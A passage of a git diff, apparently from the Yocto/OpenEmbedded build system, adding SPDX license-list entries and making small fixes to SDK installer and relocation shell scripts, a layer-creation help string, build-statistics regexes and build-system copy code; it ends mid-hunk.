+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Xnet.json",
+      "referenceNumber": 427,
+      "name": "X.Net License",
+      "licenseId": "Xnet",
+      "seeAlso": [
+        "https://opensource.org/licenses/Xnet"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/TU-Berlin-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/TU-Berlin-1.0.json",
+      "referenceNumber": 428,
+      "name": "Technische Universitaet Berlin License 1.0",
+      "licenseId": "TU-Berlin-1.0",
+      "seeAlso": [
+        "https://github.com/swh/ladspa/blob/7bf6f3799fdba70fda297c2d8fd9f526803d9680/gsm/COPYRIGHT"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/AGPL-3.0.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/AGPL-3.0.json",
+      "referenceNumber": 429,
+      "name": "GNU Affero General Public License v3.0",
+      "licenseId": "AGPL-3.0",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/agpl.txt",
+        "https://opensource.org/licenses/AGPL-3.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CAL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CAL-1.0.json",
+      "referenceNumber": 430,
+      "name": "Cryptographic Autonomy License 1.0",
+      "licenseId": "CAL-1.0",
+      "seeAlso": [
+        "http://cryptographicautonomylicense.com/license-text.html",
+        "https://opensource.org/licenses/CAL-1.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/AFL-3.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/AFL-3.0.json",
+      "referenceNumber": 431,
+      "name": "Academic Free License v3.0",
+      "licenseId": "AFL-3.0",
+      "seeAlso": [
+        "http://www.rosenlaw.com/AFL3.0.htm",
+        "https://opensource.org/licenses/afl-3.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CECILL-C.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CECILL-C.json",
+      "referenceNumber": 432,
+      "name": "CeCILL-C Free Software License Agreement",
+      "licenseId": "CECILL-C",
+      "seeAlso": [
+        "http://www.cecill.info/licences/Licence_CeCILL-C_V1-en.html"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/OGL-UK-3.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OGL-UK-3.0.json",
+      "referenceNumber": 433,
+      "name": "Open Government Licence v3.0",
+      "licenseId": "OGL-UK-3.0",
+      "seeAlso": [
+        "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-3-Clause-Clear.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Clear.json",
+      "referenceNumber": 434,
+      "name": "BSD 3-Clause Clear License",
+      "licenseId": "BSD-3-Clause-Clear",
+      "seeAlso": [
+        "http://labs.metacarta.com/license-explanation.html#license"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-3-Clause-Modification.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Modification.json",
+      "referenceNumber": 435,
+      "name": "BSD 3-Clause Modification",
+      "licenseId": "BSD-3-Clause-Modification",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing:BSD#Modification_Variant"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-SA-2.0-UK.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.0-UK.json",
+      "referenceNumber": 436,
+      "name": "Creative Commons Attribution Share Alike 2.0 England and Wales",
+      "licenseId": "CC-BY-SA-2.0-UK",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-sa/2.0/uk/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Saxpath.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Saxpath.json",
+      "referenceNumber": 437,
+      "name": "Saxpath License",
+      "licenseId": "Saxpath",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Saxpath_License"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/NLPL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NLPL.json",
+      "referenceNumber": 438,
+      "name": "No Limit Public License",
+      "licenseId": "NLPL",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/NLPL"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/SimPL-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SimPL-2.0.json",
+      "referenceNumber": 439,
+      "name": "Simple Public License 2.0",
+      "licenseId": "SimPL-2.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/SimPL-2.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/psfrag.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/psfrag.json",
+      "referenceNumber": 440,
+      "name": "psfrag License",
+      "licenseId": "psfrag",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/psfrag"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Spencer-86.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Spencer-86.json",
+      "referenceNumber": 441,
+      "name": "Spencer License 86",
+      "licenseId": "Spencer-86",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OCCT-PL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OCCT-PL.json",
+      "referenceNumber": 442,
+      "name": "Open CASCADE Technology Public License",
+      "licenseId": "OCCT-PL",
+      "seeAlso": [
+        "http://www.opencascade.com/content/occt-public-license"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CERN-OHL-S-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CERN-OHL-S-2.0.json",
+      "referenceNumber": 443,
+      "name": "CERN Open Hardware Licence Version 2 - Strongly Reciprocal",
+      "licenseId": "CERN-OHL-S-2.0",
+      "seeAlso": [
+        "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/ErlPL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/ErlPL-1.1.json",
+      "referenceNumber": 444,
+      "name": "Erlang Public License v1.1",
+      "licenseId": "ErlPL-1.1",
+      "seeAlso": [
+        "http://www.erlang.org/EPLICENSE"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/MIT-CMU.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MIT-CMU.json",
+      "referenceNumber": 445,
+      "name": "CMU License",
+      "licenseId": "MIT-CMU",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing:MIT?rd\u003dLicensing/MIT#CMU_Style",
+        "https://github.com/python-pillow/Pillow/blob/fffb426092c8db24a5f4b6df243a8a3c01fb63cd/LICENSE"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/NIST-PD.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NIST-PD.json",
+      "referenceNumber": 446,
+      "name": "NIST Public Domain Notice",
+      "licenseId": "NIST-PD",
+      "seeAlso": [
+        "https://github.com/tcheneau/simpleRPL/blob/e645e69e38dd4e3ccfeceb2db8cba05b7c2e0cd3/LICENSE.txt",
+        "https://github.com/tcheneau/Routing/blob/f09f46fcfe636107f22f2c98348188a65a135d98/README.md"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OSL-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OSL-2.0.json",
+      "referenceNumber": 447,
+      "name": "Open Software License 2.0",
+      "licenseId": "OSL-2.0",
+      "seeAlso": [
+        "http://web.archive.org/web/20041020171434/http://www.rosenlaw.com/osl2.0.html"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/APSL-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/APSL-2.0.json",
+      "referenceNumber": 448,
+      "name": "Apple Public Source License 2.0",
+      "licenseId": "APSL-2.0",
+      "seeAlso": [
+        "http://www.opensource.apple.com/license/apsl/"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Leptonica.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Leptonica.json",
+      "referenceNumber": 449,
+      "name": "Leptonica License",
+      "licenseId": "Leptonica",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Leptonica"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/PolyForm-Small-Business-1.0.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/PolyForm-Small-Business-1.0.0.json",
+      "referenceNumber": 450,
+      "name": "PolyForm Small Business License 1.0.0",
+      "licenseId": "PolyForm-Small-Business-1.0.0",
+      "seeAlso": [
+        "https://polyformproject.org/licenses/small-business/1.0.0"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/LiLiQ-P-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LiLiQ-P-1.1.json",
+      "referenceNumber": 451,
+      "name": "Licence Libre du Québec – Permissive version 1.1",
+      "licenseId": "LiLiQ-P-1.1",
+      "seeAlso": [
+        "https://forge.gouv.qc.ca/licence/fr/liliq-v1-1/",
+        "http://opensource.org/licenses/LiLiQ-P-1.1"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/NetCDF.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NetCDF.json",
+      "referenceNumber": 452,
+      "name": "NetCDF license",
+      "licenseId": "NetCDF",
+      "seeAlso": [
+        "http://www.unidata.ucar.edu/software/netcdf/copyright.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OML.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OML.json",
+      "referenceNumber": 453,
+      "name": "Open Market License",
+      "licenseId": "OML",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Open_Market_License"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/AGPL-3.0-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/AGPL-3.0-or-later.json",
+      "referenceNumber": 454,
+      "name": "GNU Affero General Public License v3.0 or later",
+      "licenseId": "AGPL-3.0-or-later",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/agpl.txt",
+        "https://opensource.org/licenses/AGPL-3.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/OLDAP-2.2.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.json",
+      "referenceNumber": 455,
+      "name": "Open LDAP Public License v2.2",
+      "licenseId": "OLDAP-2.2",
+      "seeAlso": [
+        "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d470b0c18ec67621c85881b2733057fecf4a1acc3"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-3-Clause.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause.json",
+      "referenceNumber": 456,
+      "name": "BSD 3-Clause \"New\" or \"Revised\" License",
+      "licenseId": "BSD-3-Clause",
+      "seeAlso": [
+        "https://opensource.org/licenses/BSD-3-Clause"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/WTFPL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/WTFPL.json",
+      "referenceNumber": 457,
+      "name": "Do What The F*ck You Want To Public License",
+      "licenseId": "WTFPL",
+      "seeAlso": [
+        "http://www.wtfpl.net/about/",
+        "http://sam.zoy.org/wtfpl/COPYING"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/OGL-UK-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OGL-UK-2.0.json",
+      "referenceNumber": 458,
+      "name": "Open Government Licence v2.0",
+      "licenseId": "OGL-UK-2.0",
+      "seeAlso": [
+        "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/2/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-3-Clause-Attribution.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Attribution.json",
+      "referenceNumber": 459,
+      "name": "BSD with attribution",
+      "licenseId": "BSD-3-Clause-Attribution",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/BSD_with_Attribution"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/RPSL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/RPSL-1.0.json",
+      "referenceNumber": 460,
+      "name": "RealNetworks Public Source License v1.0",
+      "licenseId": "RPSL-1.0",
+      "seeAlso": [
+        "https://helixcommunity.org/content/rpsl",
+        "https://opensource.org/licenses/RPSL-1.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-DE.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-DE.json",
+      "referenceNumber": 461,
+      "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 Germany",
+      "licenseId": "CC-BY-NC-ND-3.0-DE",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc-nd/3.0/de/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/EUPL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/EUPL-1.1.json",
+      "referenceNumber": 462,
+      "name": "European Union Public License 1.1",
+      "licenseId": "EUPL-1.1",
+      "seeAlso": [
+        "https://joinup.ec.europa.eu/software/page/eupl/licence-eupl",
+        "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/eupl1.1.-licence-en_0.pdf",
+        "https://opensource.org/licenses/EUPL-1.1"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Sendmail-8.23.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Sendmail-8.23.json",
+      "referenceNumber": 463,
+      "name": "Sendmail License 8.23",
+      "licenseId": "Sendmail-8.23",
+      "seeAlso": [
+        "https://www.proofpoint.com/sites/default/files/sendmail-license.pdf",
+        "https://web.archive.org/web/20181003101040/https://www.proofpoint.com/sites/default/files/sendmail-license.pdf"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/ODC-By-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/ODC-By-1.0.json",
+      "referenceNumber": 464,
+      "name": "Open Data Commons Attribution License v1.0",
+      "licenseId": "ODC-By-1.0",
+      "seeAlso": [
+        "https://opendatacommons.org/licenses/by/1.0/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/D-FSL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/D-FSL-1.0.json",
+      "referenceNumber": 465,
+      "name": "Deutsche Freie Software Lizenz",
+      "licenseId": "D-FSL-1.0",
+      "seeAlso": [
+        "http://www.dipp.nrw.de/d-fsl/lizenzen/",
+        "http://www.dipp.nrw.de/d-fsl/index_html/lizenzen/de/D-FSL-1_0_de.txt",
+        "http://www.dipp.nrw.de/d-fsl/index_html/lizenzen/en/D-FSL-1_0_en.txt",
+        "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl",
+        "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/deutsche-freie-software-lizenz",
+        "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/german-free-software-license",
+        "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/D-FSL-1_0_de.txt/at_download/file",
+        "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/D-FSL-1_0_en.txt/at_download/file"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-4-Clause.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause.json",
+      "referenceNumber": 466,
+      "name": "BSD 4-Clause \"Original\" or \"Old\" License",
+      "licenseId": "BSD-4-Clause",
+      "seeAlso": [
+        "http://directory.fsf.org/wiki/License:BSD_4Clause"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/LGPL-2.1.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/LGPL-2.1.json",
+      "referenceNumber": 467,
+      "name": "GNU Lesser General Public License v2.1 only",
+      "licenseId": "LGPL-2.1",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
+        "https://opensource.org/licenses/LGPL-2.1"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-2-Clause-Views.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-Views.json",
+      "referenceNumber": 468,
+      "name": "BSD 2-Clause with views sentence",
+      "licenseId": "BSD-2-Clause-Views",
+      "seeAlso": [
+        "http://www.freebsd.org/copyright/freebsd-license.html",
+        "https://people.freebsd.org/~ivoras/wine/patch-wine-nvidia.sh",
+        "https://github.com/protegeproject/protege/blob/master/license.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Artistic-1.0-Perl.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Artistic-1.0-Perl.json",
+      "referenceNumber": 469,
+      "name": "Artistic License 1.0 (Perl)",
+      "licenseId": "Artistic-1.0-Perl",
+      "seeAlso": [
+        "http://dev.perl.org/licenses/artistic.html"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/NPOSL-3.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NPOSL-3.0.json",
+      "referenceNumber": 470,
+      "name": "Non-Profit Open Software License 3.0",
+      "licenseId": "NPOSL-3.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/NOSL3.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/gSOAP-1.3b.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/gSOAP-1.3b.json",
+      "referenceNumber": 471,
+      "name": "gSOAP Public License v1.3b",
+      "licenseId": "gSOAP-1.3b",
+      "seeAlso": [
+        "http://www.cs.fsu.edu/~engelen/license.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Interbase-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Interbase-1.0.json",
+      "referenceNumber": 472,
+      "name": "Interbase Public License v1.0",
+      "licenseId": "Interbase-1.0",
+      "seeAlso": [
+        "https://web.archive.org/web/20060319014854/http://info.borland.com/devsupport/interbase/opensource/IPL.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/StandardML-NJ.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/StandardML-NJ.json",
+      "referenceNumber": 473,
+      "name": "Standard ML of New Jersey License",
+      "licenseId": "StandardML-NJ",
+      "seeAlso": [
+        "http://www.smlnj.org//license.html"
+      ],
+      "isOsiApproved": false
+    }
+  ],
+  "releaseDate": "2021-08-08"
+}
\ No newline at end of file
diff --git a/meta/files/toolchain-shar-extract.sh b/meta/files/toolchain-shar-extract.sh
index bea6d4189a..4386b985bb 100644
--- a/meta/files/toolchain-shar-extract.sh
+++ b/meta/files/toolchain-shar-extract.sh
@@ -56,7 +56,8 @@ if ! xz -V > /dev/null 2>&1; then
 	exit 1
 fi
 
-DEFAULT_INSTALL_DIR="@SDKPATH@"
+SDK_BUILD_PATH="@SDKPATH@"
+DEFAULT_INSTALL_DIR="@SDKPATHINSTALL@"
 SUDO_EXEC=""
 EXTRA_TAR_OPTIONS=""
 target_sdk_dir=""
@@ -95,7 +96,7 @@ while getopts ":yd:npDRSl" OPT; do
 		listcontents=1
 		;;
 	*)
-		echo "Usage: $(basename $0) [-y] [-d <dir>]"
+		echo "Usage: $(basename "$0") [-y] [-d <dir>]"
 		echo "  -y         Automatic yes to all prompts"
 		echo "  -d <dir>   Install the SDK to <dir>"
 		echo "======== Extensible SDK only options ============"
@@ -111,17 +112,17 @@ while getopts ":yd:npDRSl" OPT; do
 	esac
 done
 
-payload_offset=$(($(grep -na -m1 "^MARKER:$" $0|cut -d':' -f1) + 1))
+payload_offset=$(($(grep -na -m1 "^MARKER:$" "$0"|cut -d':' -f1) + 1))
 if [ "$listcontents" = "1" ] ; then
     if [ @SDK_ARCHIVE_TYPE@ = "zip" ]; then
-        tail -n +$payload_offset $0 > sdk.zip
+        tail -n +$payload_offset "$0" > sdk.zip
         if unzip -l sdk.zip;then
             rm sdk.zip
         else
             rm sdk.zip && exit 1
         fi
     else
-        tail -n +$payload_offset $0| tar tvJ || exit 1
+        tail -n +$payload_offset "$0"| tar tvJ || exit 1
     fi
     exit
 fi
@@ -242,14 +243,14 @@ fi
 
 printf "Extracting SDK..."
 if [ @SDK_ARCHIVE_TYPE@ = "zip" ]; then
-    tail -n +$payload_offset $0 > sdk.zip
+    tail -n +$payload_offset "$0" > sdk.zip
     if $SUDO_EXEC unzip $EXTRA_TAR_OPTIONS sdk.zip -d $target_sdk_dir;then
         rm sdk.zip
     else
         rm sdk.zip && exit 1
     fi
 else
-    tail -n +$payload_offset $0| $SUDO_EXEC tar mxJ -C $target_sdk_dir --checkpoint=.2500 $EXTRA_TAR_OPTIONS || exit 1
+    tail -n +$payload_offset "$0"| $SUDO_EXEC tar mxJ -C $target_sdk_dir --checkpoint=.2500 $EXTRA_TAR_OPTIONS || exit 1
 fi
 echo "done"
 
diff --git a/meta/files/toolchain-shar-relocate.sh b/meta/files/toolchain-shar-relocate.sh
index e3c10018ef..cee9adbf39 100644
--- a/meta/files/toolchain-shar-relocate.sh
+++ b/meta/files/toolchain-shar-relocate.sh
@@ -5,7 +5,7 @@ fi
 
 # fix dynamic loader paths in all ELF SDK binaries
 native_sysroot=$($SUDO_EXEC cat $env_setup_script |grep 'OECORE_NATIVE_SYSROOT='|cut -d'=' -f2|tr -d '"')
-dl_path=$($SUDO_EXEC find $native_sysroot/lib -name "ld-linux*")
+dl_path=$($SUDO_EXEC find $native_sysroot/lib -maxdepth 1 -name "ld-linux*")
 if [ "$dl_path" = "" ] ; then
 	echo "SDK could not be set up. Relocate script unable to find ld-linux.so. Abort!"
 	exit 1
@@ -55,10 +55,13 @@ fi
 for replace in "$target_sdk_dir -maxdepth 1" "$native_sysroot"; do
 	$SUDO_EXEC find $replace -type f
 done | xargs -n100 file | grep ":.*\(ASCII\|script\|source\).*text" | \
-    awk -F':' '{printf "\"%s\"\n", $1}' | \
-    grep -Ev "$target_sdk_dir/(environment-setup-*|relocate_sdk*|${0##*/})" | \
+    awk -F': ' '{printf "\"%s\"\n", $1}' | \
+    grep -Fv -e "$target_sdk_dir/environment-setup-" \
+             -e "$target_sdk_dir/relocate_sdk" \
+             -e "$target_sdk_dir/post-relocate-setup" \
+             -e "$target_sdk_dir/${0##*/}" | \
     xargs -n100 $SUDO_EXEC sed -i \
-        -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:g" \
+        -e "s:$SDK_BUILD_PATH:$target_sdk_dir:g" \
         -e "s:^#! */usr/bin/perl.*:#! /usr/bin/env perl:g" \
         -e "s: /usr/bin/perl: /usr/bin/env perl:g"
 
@@ -69,7 +72,7 @@ fi
 
 # change all symlinks pointing to @SDKPATH@
 for l in $($SUDO_EXEC find $native_sysroot -type l); do
-	$SUDO_EXEC ln -sfn $(readlink $l|$SUDO_EXEC sed -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:") $l
+	$SUDO_EXEC ln -sfn $(readlink $l|$SUDO_EXEC sed -e "s:$SDK_BUILD_PATH:$target_sdk_dir:") $l
 	if [ $? -ne 0 ]; then
 		echo "Failed to setup symlinks. Relocate script failed. Abort!"
 		exit 1
diff --git a/meta/lib/bblayers/create.py b/meta/lib/bblayers/create.py
index 542f31fc81..f49b48d1b4 100644
--- a/meta/lib/bblayers/create.py
+++ b/meta/lib/bblayers/create.py
@@ -71,7 +71,7 @@ class CreatePlugin(LayerPlugin):
     def register_commands(self, sp):
         parser_create_layer = self.add_command(sp, 'create-layer', self.do_create_layer, parserecipes=False)
         parser_create_layer.add_argument('layerdir', help='Layer directory to create')
-        parser_create_layer.add_argument('--priority', '-p', default=6, help='Layer directory to create')
+        parser_create_layer.add_argument('--priority', '-p', default=6, help='Priority of recipes in layer')
         parser_create_layer.add_argument('--example-recipe-name', '-e', dest='examplerecipe', default='example', help='Filename of the example recipe')
         parser_create_layer.add_argument('--example-recipe-version', '-v', dest='version', default='0.1', help='Version number for the example recipe')
 
diff --git a/meta/lib/buildstats.py b/meta/lib/buildstats.py
index 8627ed3c31..c52b6c3b72 100644
--- a/meta/lib/buildstats.py
+++ b/meta/lib/buildstats.py
@@ -43,8 +43,8 @@ class SystemStats:
         # depends on the heartbeat event, which fires less often.
         self.min_seconds = 1
 
-        self.meminfo_regex = re.compile(b'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)')
-        self.diskstats_regex = re.compile(b'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$')
+        self.meminfo_regex = re.compile(rb'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)')
+        self.diskstats_regex = re.compile(rb'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$')
         self.diskstats_ltime = None
         self.diskstats_data = None
         self.stat_ltimes = None
diff --git a/meta/lib/oe/copy_buildsystem.py b/meta/lib/oe/copy_buildsystem.py
index 31a84f5b06..d97bf9d1b9 100644
--- a/meta/lib/oe/copy_buildsystem.py
+++ b/meta/lib/oe/copy_buildsystem.py
@@ -20,7 +20,7 @@ def _smart_copy(src, dest):
     mode = os.stat(src).st_mode
     if stat.S_ISDIR(mode):
         bb.utils.mkdirhier(dest)
-        cmd = "tar --exclude='.git' --xattrs --xattrs-include='*' -chf - -C %s -p . \
+        cmd = "tar --exclude='.git' --exclude='__pycache__' --xattrs --xattrs-include='*' -chf - -C %s -p . \
         | tar --xattrs --xattrs-include='*' -xf - -C %s" % (src, dest)
         subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
     else:
@@ -259,7 +259,7 @@ def create_locked_sstate_cache(lockedsigs, input_sstate_cache, output_sstate_cac
     bb.note('Generating sstate-cache...')
 
     nativelsbstring = d.getVar('NATIVELSBSTRING')
-    bb.process.run("gen-lockedsig-cache %s %s %s %s %s" % (lockedsigs, input_sstate_cache, output_sstate_cache, nativelsbstring, filterfile or ''))
+    bb.process.run("PYTHONDONTWRITEBYTECODE=1 gen-lockedsig-cache %s %s %s %s %s" % (lockedsigs, input_sstate_cache, output_sstate_cache, nativelsbstring, filterfile or ''))
     if fixedlsbstring and nativelsbstring != fixedlsbstring:
         nativedir = output_sstate_cache + '/' + nativelsbstring
         if os.path.isdir(nativedir):
@@ -286,7 +286,7 @@ def check_sstate_task_list(d, targets, filteroutfile, cmdprefix='', cwd=None, lo
